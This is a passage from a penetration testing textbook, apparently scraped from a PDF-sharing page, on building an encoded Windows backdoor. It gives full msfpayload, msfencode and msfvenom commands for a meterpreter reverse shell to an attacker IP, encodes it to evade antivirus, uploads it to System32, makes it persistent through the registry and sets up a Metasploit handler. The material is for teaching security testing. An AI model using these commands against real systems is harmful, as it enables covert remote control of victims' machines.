Ethical Hacking and Penetration Testing Guide
Yüklə 22,44 Mb. Pdf görüntüsü
|
|
MSFEncode
Next we would use msfencode to encode our payload. We can see the list of encoders available on msfencode by issuing the following command. root@bt> msfencode –l 246 ◾ Ethical Hacking and Penetration Testing Guide We can use msfencode simultaneously with msfpayload by issuing the following command: msfpayload windows/meterpreter/reverse_tcp LHOST = 192.168.75.144 LPORT = 4444 R | msfencode –e x86/shikata_ga_nai –t exe >/root/Desktop/backdoor. exe The –e parameter is used to specify the type of encoding, which in this case is shikata _ ga _ nai ; the –t parameter is used to define the type of format, which in this case would be exe . By default, msfencode would use a single iteration of the encoder; if you would like to use more iterations you can specify a –i parameter followed by the number of iterations. MSFVenom Msfvenom is a combination of both msfpayload and msfencode, which would make it easier for us to generate a payload and encode at the same time. We can view the options by typing the fol- lowing command: msfvenom –h Postexploitation ◾ 247 To generate an encoded executable, we will use the following command: root@bt:~# msfvenom –p windows/meterpreter/reverse_tcp –e x86/shikata_ga_ nai –i 5 LHOST = 192.168.75.144 LPORT = 4444 –f exe >/root/Desktop/ backdoor.exe We can see that our backdoor succeeded with five iterations. Now it’s time to upload our back- door to the target machine and make it persistent just like we did with netcat. We use the same commands to accomplish our goal. Command : upload/root/Desktop/backdoor.exe C:\\Windows\\System32 Next we make our backdoor persistent by making changes to the registry. Once our registry value has been set, as soon as Windows reboots, our backdoor starts making connections to the lhost we provided. So in order to receive the connection, we need to set up a handler. We can set up a handler by issuing the following command from the Metasploit console: use exploit/multi/handler Next we need to define LHOST and LPORT, which we defined while we created the backdoor. As soon as Windows reboots, a meterpreter session will be opened again: Yüklə 22,44 Mb. Dostları ilə paylaş:
|